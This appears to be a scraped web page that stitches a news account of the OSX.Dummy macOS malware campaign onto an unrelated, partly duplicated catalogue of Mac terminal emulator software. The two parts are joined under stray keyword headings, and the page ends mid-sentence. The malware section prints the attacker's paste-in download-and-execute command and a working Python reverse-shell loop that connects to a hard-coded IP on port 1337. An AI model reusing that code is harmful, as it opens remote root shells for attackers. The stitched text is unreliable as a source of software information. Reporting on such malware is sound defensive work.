The Dumb Binary For Mac

Posted on by admin

Share this story. Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs.

The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker., a Mac malware expert, also examined the malware and dubbed it 'OSX.Dummy' because, as he wrote:. the infection method is dumb. the massive size of the binary is dumb.

the persistence mechanism is lame (and thus also dumb). the capabilities are rather limited (and thus rather dumb). it's trivial to detect at every step (that dumb). And finally, the malware saves the user's password to dumpdummy The attack, today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this: cd /tmp && curl -s curl $MALICIOUSURL script && chmod +x script &&./script The monster binary carries with it a host of libraries, including Open SSL libraries to encrypt its communications back to the server—a system running in a data center of the hosting provider CrownCloud. Once it executes, it uses the sudo command to make itself owned by macOS's root user.

In order for this to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called 'dumpdummy'. The script also issues commands to add itself to the startup list for macOS—making itself persistent.

The script's backdoor code, as Wardle noted, is a recursive Python command-line call with a hard-coded IP address for the connection that uses port 1337—an obvious joke. #!/bin/bash while: do python -c 'import socket,subprocess,os; s=socket.socket(socket.AFINET,socket.SOCKSTREAM); s.connect(('185.243.115.230',1337)); os.dup2(s.fileno,0); os.dup2(s.fileno,1); os.dup2(s.fileno,2); p=subprocess.call('/bin/sh','-i');' sleep 5 done The attacker's intent is not yet clear. But because all of this executes through a Terminal window, it bypasses MacOS's GateKeeper malware protection, despite being unsigned code. And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code has to overcome the common sense of the victim as well.

Commercial; see text. Current Version: 3.0.4 (February 12, 2004) Cel Corporation produces Celview for Macintosh (formerly Celview: the new Mac RUMBA), which is a series of products that provides 3270 and 5250 display, print and file transfer capabilities via SNA, TCP/IP, and AppleTalk. Pricing starts at $199 for a single user license, and quickly scales down from there; see the for more information. Please note that you will need to obtain a product name and key code to ensure full functionality of the demo; see below for links.

Shareware; $20-$60 Current Version: 4.6.6 / 10.2.1 (July 21, 2010) dataComet is, without a doubt, the single most sophisticated terminal emulation client for the Mac. Quite a bit more mature than its predecessor Comet, above, it supports full emulation of PC-ANSI, VT-52, VT-100, VT-102, VT-220, IBM 3278 and IBM 3279 terminals, in glorious full color. It's extremely fast and feature-filled, supporting such unusual features as scrollback in 327x modes, X-Window-like window iconization, very sophisticated font handling (including leading control!), file transfers, very extensive preferences, superb printing controls, support for 5250 menus and function keys in 327x emulation modes, AppleScript support, and much, much more. Version 4.6.6 - the latest release for 'Classic' Mac OS - adds/changes the following:. Adds support for IND$FILE transfers with IBM mainframes, improved support for SCO-ANSI emulation, support for entering a telephone number for automatic modem dialing in the 'New.' /'Reconfigure Session.' Dialog, and several other features and bug fixes.

Version 10.2.1 - the latest release for Mac OS X - adds/changes the following:. The emulator screen position is now saved correctly when the session document is closed; in 10.2.0, the position was only saved if the window had been zoomed. A zoomed emulator window will now appear on the same monitor when more than one monitor is in use. Command-Clicking on a document window title now brings up the standard MacOS file path popup menu, allowing you to view the file path and open folders in the Finder easily. The Window menu 'Next' command (option-tab) now proceeds to the next open window rather than stopping the cycle if a Session window has a closed connection. The appearance of emulator windows has been improved. The packet counters and timer are now greyed out when the session is closed, and the Rows and Columns fields at the bottom of the emulator screen now have more area allocated to them.

Dialogs have been fixed so the text cursor appears when the curosr is over the active text field. The appearance and functionality of the 'Find' dialog has been improved. The 'Backwards' checkbox has been replaced by a 'Previous' button. The 'Replace' command now works correctly when the 'Replace' text is empty. The 'Define Macros.' Dialog now always displays the ASCII character zero (NUL), which is used in dataComet macros to terminate strings, as ' 000' rather than the Comet Fonts '^A' character to avoid confusion. The 'Configure Terminal Session' dialog has been improved so that tabbing to the next field works in a sensible fashion, and clicking on a text field which does not apply to the current connection type produces a brief popup message rather than an annoying alert - and now it's not possible to enter text in that field.

The default session type for a 'New' session is now Telnet (or SSH for dataComet-Secure) rather than a 'Shell' session. Entering an empty address in the 'Configure Terminal Session' 'Connect to:' field now works correctly to connect to the machine's own IP address. The File Transfer Progress dialog now displays byte counts with commas. Fixed the File Transfer Progress dialog so the transfer counts are only updated once a second; this yields a substantial improvement (80%) in file transfer performance when using ZModem. IND$FILE IBM file transfers now display an update on the transmitted file length in the emulator prompt area. Several problems with edit windows have been fixed; extra lines should no longer appear in the window when text is pasted into the window. dataComet's edit windows now interpret linefeed characters in files so they display correctly, and saves them back to the file as linefeeds.

Edit windows will now reliably load up to the maximum 32,767 character limit, rather than failing to load the last 2,000 characters of a file which is over 30,000 characters in length. Saving a new Session configuration now always creates a new.edit companion text document, so a 'Save text' command will succeed when the session document is reopened, even when the.edit document was not saved the first time around. Changing the font in edit windows now takes effect immediately, rather than after the font size is changed. The ' 'Shift Text' buttons at the bottom left corner of edit windows now repeat when they're held down.

Saving a new session document to the global sessions folder now updates the Sessions submenu. Submenus have been fixed so they display more rapidly when you move the cursor over them to select an item from them. The 3270/5250 menus no longer shift position when the 5250 menu is toggled on and off in the 3270 preferences panel.

The Macros menu now always appears before the Window menu. Window Minimize and Maximize events are now handled better; the window's menu item in the Window menu is marked to show the window has been Minimized, and you can expand the window by selecting the item. SCP/RCP file transfers are now enabled in dataComet X, providing an alternative to using ZModem. SCP transfers in dataComet X are not encrypted (note that the 'scp' file transfer protocol is the same as UNIX's 'rcp' with a security layer wrapped around it.) Also, the SCP file transfer dialog no longer automatically brings up the Select File dialog when it's selected from the menu to perform an upload. Emulator screen printing: color banding which appeared when printing an emulator screen in color has been improved, so it should not appear unless a font is being drawn in double-wide/double-high modes (VT100). Also, the emulator cursor position may have appeared in screens printed in a very small size; this has also been fixed. DataComet is a $20 for the 'Classic' version and $60 for the Mac OS X version.

User Reviews 'I am using dataComet and, from what I can see, it is a great telnet program. It seems to be more stable than NCSA 2.7b4.' —Mike Prindle 'Where do I buy the fan club t-shirt? It works; it has great features, and the users control the funding, rather than the University of Illinois. While I liked NCSA Telnet and Brown TN3270, and don't mean to imply that they did not work or were not also excellent, I like having one application do both.' —Andrew Starr 'I need to hook up to IBM mainframes; dataComet is the best tool for me. Features I like: 3279 and VT100 support, scroll-back buffers, macros, and fonts.

Tn3270 hasn't changed since 1996. DataComet is constantly improving.' —John Holland 10.0.2 'This program had so many options, it was hard to figure out what was going on. It has really amazing font customizability. You can even use a different font for bold text in the terminal. Unfortunately, it doesn't have tabbed terminals.

I have no idea why it opens up a second window when I start a new terminal. It ran quickly on my powerbook G4 867MHz, unlike iTerm.' —Edwin 10.0.2 'I'm using this for 3270 emulation, on a Mac Pro running 10.4.7. The UI is a little clunky compared to tn3270x (took me a couple minutes to figure out how to open a remote session versus a local terminal), and in ISPF it incorrectly renders certain common 3270 graphical elements (e.g. Box borders, or the border below the top ISPF menu). However, it does support destructive backspace by default, which it something I have been unable to get tn3270x to do for me.

In general, it's keyboard mapping flexibility appears superior to that of tn3270x, and it also supports a wider variety of automatic codepage translations for input (1047 versus 37, for example, and many others).' —Jared Hunter, September 22, 2006 another review!

Shareware; see text Current Version: 5.0.5 / 10.2.1 (July 21, 2010) Take dataComent, above, and add support for SSH1, SSH2, Kerberos 5, and SCP file transfers, and you've got dataComet-Secure. It's a stupendously good package with no real competition. The download below allows you to try the software out for 30 days; dataComet-Secure is priced at $70 per copy ($35 academic; volume discounts are available). Federal regulations mandated the switch to this pricing scheme for this version. Version 5.0.5 improves performance when running in the OS X Classic environment and includes several minor bug fixes. 'dataComet-Secure X' is a release of dataComet-Secure built for OS X (Carbon), which adds support for local shell sessions (Terminal sessions), OS X serial devices, and drag and drop in addition to support for Telnet/TN3270, SSH1, SSH2, Kerberos 5, and SCP file transfers.

Version 10.2.1 - the latest release for Mac OS X - adds/changes the following:. The emulator screen position is now saved correctly when the session document is closed; in 10.2.0, the position was only saved if the window had been zoomed. A zoomed emulator window will now appear on the same monitor when more than one monitor is in use. Command-Clicking on a document window title now brings up the standard MacOS file path popup menu, allowing you to view the file path and open folders in the Finder easily. The Window menu 'Next' command (option-tab) now proceeds to the next open window rather than stopping the cycle if a Session window has a closed connection. The appearance of emulator windows has been improved. The packet counters and timer are now greyed out when the session is closed, and the Rows and Columns fields at the bottom of the emulator screen now have more area allocated to them.

Dialogs have been fixed so the text cursor appears when the curosr is over the active text field. The appearance and functionality of the 'Find' dialog has been improved. The 'Backwards' checkbox has been replaced by a 'Previous' button. The 'Replace' command now works correctly when the 'Replace' text is empty.

The 'Define Macros.' Dialog now always displays the ASCII character zero (NUL), which is used in dataComet macros to terminate strings, as ' 000' rather than the Comet Fonts '^A' character to avoid confusion.

The 'Configure Terminal Session' dialog has been improved so that tabbing to the next field works in a sensible fashion, and clicking on a text field which does not apply to the current connection type produces a brief popup message rather than an annoying alert - and now it's not possible to enter text in that field. The default session type for a 'New' session is now Telnet (or SSH for dataComet-Secure) rather than a 'Shell' session. Entering an empty address in the 'Configure Terminal Session' 'Connect to:' field now works correctly to connect to the machine's own IP address. The File Transfer Progress dialog now displays byte counts with commas. Fixed the File Transfer Progress dialog so the transfer counts are only updated once a second; this yields a substantial improvement (80%) in file transfer performance when using ZModem.

IND$FILE IBM file transfers now display an update on the transmitted file length in the emulator prompt area. Several problems with edit windows have been fixed; extra lines should no longer appear in the window when text is pasted into the window. dataComet's edit windows now interpret linefeed characters in files so they display correctly, and saves them back to the file as linefeeds. Edit windows will now reliably load up to the maximum 32,767 character limit, rather than failing to load the last 2,000 characters of a file which is over 30,000 characters in length. Saving a new Session configuration now always creates a new.edit companion text document, so a 'Save text' command will succeed when the session document is reopened, even when the.edit document was not saved the first time around. Changing the font in edit windows now takes effect immediately, rather than after the font size is changed. The ' 'Shift Text' buttons at the bottom left corner of edit windows now repeat when they're held down.

Saving a new session document to the global sessions folder now updates the Sessions submenu. Submenus have been fixed so they display more rapidly when you move the cursor over them to select an item from them. The 3270/5250 menus no longer shift position when the 5250 menu is toggled on and off in the 3270 preferences panel. The Macros menu now always appears before the Window menu. Window Minimize and Maximize events are now handled better; the window's menu item in the Window menu is marked to show the window has been Minimized, and you can expand the window by selecting the item.

SCP/RCP file transfers are now enabled in dataComet X, providing an alternative to using ZModem. SCP transfers in dataComet X are not encrypted (note that the 'scp' file transfer protocol is the same as UNIX's 'rcp' with a security layer wrapped around it.) Also, the SCP file transfer dialog no longer automatically brings up the Select File dialog when it's selected from the menu to perform an upload. Emulator screen printing: color banding which appeared when printing an emulator screen in color has been improved, so it should not appear unless a font is being drawn in double-wide/double-high modes (VT100). Also, the emulator cursor position may have appeared in screens printed in a very small size; this has also been fixed. Current Version: 1.2 GLterm is a replacement for the Terminal application which ships with Mac OS X.

It's made to be faster, and to support more common terminal features. It supports full ANSI colors, all vt102 protocols, all DEC function keys, and a selection of useful xterm sequences. The 'Big Thing' is that GLterm uses X11.bdf fonts and renders them using OpenGL, so it's very fast. As long as you have a working 3D accelerator. It should work as intended on B&W G3s and up (for desktops) and on white iBooks and up (for laptops) - that is, any a machine whose 3D accelerator is handled properly in OS X. Open source; $0 Current Version: 0.10 (October 8, 2009) iTerm is a full featured terminal emulation program written for OS X using Cocoa. It supports language encodings, VT100/ANSI/XTERM emulation and many convenient GUI features.

ITerm is merged from CTerminal and TerminalX. The program is based on the code of JTerminal, and a large part of the original code is rewritten to implement more features and to run more efficiently. The current version is still in a beta stage. Features include:.

Native Cocoa application that supports Mac OS X 10.4 Tiger. Supports all language encodings that are available with OS X. Complete VT100 emulation, with additional support for most common xterm and ANSI escape sequences. Xterm compatibility. Address book. Anti-idle function that avoids disconnection because of no activity. Transparent windows.

Multi-Tab within one window Version 0.10 adds/changes the following:. Smart window placement - new terminals are position to avoid overlap with existing ones.

Open new tab in previous directory (See FAQ to get this to work). Improved drawing performance, particularly when the scrollback buffer is full. Better interactivity when terminals are busy, menus no longer block applications. Various terminal emulation fixes.

Cryptographically signed auto updates. Open source; $0 Current Version: 3.0b1 / 4.0 beta build 20100720 (July 21, 2010) Similar in scope to BetterTelnet, above, MacTelnet is a re-working of the public NCSA Telnet code that was abandoned by NCSA some time ago. It's very much modernized, and it is fully scriptable, includes support for Mac OS X, and more; however, this software has had a history of being fairly buggy - something that presents a real issue in a work that should be transparent and reliable as a daily work tool. The details the many ways in which MacTelnet differs from the original NCSA version. Version 3.0b1 - the final version for 'Classic' Mac OS - included many and a several bug fixes, including the following:. Bug Fix: miscellaneous issues during font list rebuilding.

Feature: macro sets may now contain up to 12 macros each (previously, only 10 were allowed); mapping from F1-F12 or command-0 through command-=. Feature: macros now support the ' e' sequence for Escape, just like the Mac OS X version.

Feature: floating keypad windows no longer have an Aqua appearance; instead, they look like real keyboard keys!. Feature: Bigger Text and Smaller Text commands are now available.

Feature: Show FTP Log command is once again available; this displays server activity. User Interface: now Classic MacTelnet uses the new Terminal Favorite Editor first introduced with the Mac OS X version; this new editor is less cramped and lets you configure default Bold text colors.

Cool Stuff: the About box now has background music. As of November 2008, all development has shifted to the Mac OS X version, which is now labeled version 4.

Commercial; $95 Current Version: 4.42 (February 28, 2004) / 12.11 (July 8, 2010) Carnation Software, Inc. Produces an entire line of Macintosh terminal emulation software, including MacWise, which emulates ADDS Viewpoint, Wyse 50, Wyse 60, Wyse 370, Televideo TV 925, DEC VT100 and Prism terminals, among others. Esprit III color is also supported in Wyse 370 mode.

MacWise allows a Macintosh to be used as a terminal - connected to a host computer directly, by modem, or over the Internet. The emulators support video attributes such as dim, reverse, underline, 132-column modes, and graphic characters sent from the host computer, as well as enhanced Viewpoint mode. Features include phone list and dialer for Hayes-compatible modems, on-screen programmable function keys and more. Version 12.11 - the latest version for Mac OS X - adds/changes the following:. Fix - Could not select Transparency from the Window Menu. The problem was introduced in the previous version.

Commercial; see text. Current Version: 4.3 / 2.0 (February 5, 2009) A remarkably simple alternative to its higher-priced counterparts (such as NLynx's Mac Midrange products), this provides very nice 5250 emulation via TCP/IP, and it's only a 125K download.

While the 'Classic' Mac OS version is now free, the Mac OS X version is priced at $25 for a single user ($250 for a site license), Mocha Mac TN5250 is a real bargain, too. The freely-downloadable version available below is fully functional, and should be used for evaluation purposes only. While no information is available regarding what's new in version 4.3 (the latest 'Classic' Mac OS version), version 4.2 added/changed the following:. Hidden text was displayed on print. German EBCDIC character '@' was not correct.

Version 2.0 - the latest version for Mac OS X - makes the following changes:. Added 128 bit SSL support.

The dumb binary for mac pro

User Reviews 'I selected this because CelView is way too costly. I was able to buy a company license for $250. That's slightly more than the cost of one individual license for CelView. The company is Danish and purchasing is through SWREG in Minnesota. I had no problem purchasing with a PO. I've contacted the company twice via email I received a response within minutes. We tested with the trial version since last April and purchased in July.

MochaMac is a hit with our users. They report that it is more streamlined to use, the preferences are easier to modify, and they can control the look of the 'green' screen better. ' —John Robertson another review! Commercial; $149 Current Version: 9.1 (November 30, 2009) Ericom Software produces PowerTerm InterConnect, a terminal emulator for Mac OS X that supports IBM (3270 and 5250), Compaq, Digital, Unix, Tandem, Televideo, HP, SCO, and Data General access, among others. Features include customizable function keys, multiple concurrent sessions, menu bar, scalable and selectable fonts, intelligent copy and paste, scripting, printing and more.

Version 9.1 adds/changes the following:. Support for Mac OS X versions: 10.6 Snow Leopard, 10.5 Leopard, 10.4 Tiger, 10.3 Panther and 10.2 Jaguar. Fixed a display issue when scrolling in vt-100 mode. Freeware Current Version: 2.5b5 (March 13, 1996) / 3.1.7 (May 2, 2006) / 3.2.4 (July 24, 2006) The 'old standard' freeware tn3270 tool for the Macintosh from Brown University. Although the advent of the web has made this tool less relevant to many people, it's still required equipment for serious researchers who access remotely-hosted IBM 'big iron' services. It does a fine job, and is second in capability only to dataComet (above), which offers many more features as well as complete 'standard' telnet services.

That said, for basic access, tn3270 fits the bill nicely. Note: Brown University distributes two VM/CMS commands for use with tn3270: RMAC and WMAC. These commands provide the ability to upload and download CMS files using the tn3270 session connection. Until recently, RMAC and WMAC were not year-2000 compliant. However, the versions made available as of 12/30/99 have been updated and are compliant.

The Mac OS X version was introduced in May 2003, and is still actively updated and maintained. Version 3.1.7 - the latest version for Mac OS X 10.1.5 - 10.2.7 - includes the following changes:.

The Dumb Binary For Mac Free

Fixed a bug which caused tn3270 X to crash if a pending SSL connection is closed. Fixed a bug which caused tn3270 X to crash when opening an SSL connection on an Intel Mac (under Rosetta.). Added Courier 34 as a large font which is useful for vision problems.

It allows a 24-by-80 window to fill a 20' display. Added support for the Bitstream Vera Sans Mono font, and included the font on the tn3270 disk image. Version 3.2.4 - the latest version for Mac OS X 10.2.8 and higher - includes the following changes:. Added support for Kerberos encryption.

Added support for Kerberos 4 and 5 authentication. Added support for the Telnet Start TLS option. Removed 'glue' code for 10.1.5 compatibility (since Kerberos requires 10.2.8 in any case.) The has an active discussion where you can interact with the author. User Reviews 'The tn3270 emulation works very well. It has allowed me to keep a small Mac enclave alive in an otherwise very hostile Wintel environment. Even when running on a bunch of old LCII-IIIs, it is quick and faster than the dumb terminals being pushed at us by the IS support team.

It is this kind of software which unfortunately doesn't get enough press and support.' —Julian Wan 3.2.4 'I'm using this on a Mac Pro running 10.4.7, and it's very stable. Intuitive UI for connections, and I found it easy to make larger screen sizes work (36x80 versus 24x80, for example). I was also able to create a shortcut for the missing 'Insert Key' on my Apple keyboard by creating an app-specific command in the standard keyboard prefpane.

My one gripe is the lack of a robust keyboard mapping function, as I have yet to find a way to enable destructive backspace, but that will hopefully be solved by a system-level utility in the future.' —Jared Hunter, September 22, 2006 another review! Shareware; $199 Current Version: 3.2 (December 3, 2004) While not strictly a terminal emulation application at all, those of you who understand what it does will also understand why I have categorized it onto this page. Commercial; $79.99 Current Version: 6.24 (July 7, 2010) EmTec Innovative Software produces ZOC, a telnet client, secure shell client and terminal emulator that his highly configurable. Distinguishing features include:. Tabbed sessions. Overview screen to show thumbnails of all open sessions.

'Colorful tabs' feature to tint user interface elements with different colors depending on which host is connected. Host directory (with full option set for each entry and automatic login). User button bar to map texts, scripts, phone book entries, external protocols and shell commands to buttons (incl. Button assistant). F-Macro keys for texts, scripts, phone book entries, external shell commands, etc.

Local typing (entry field with history e.g.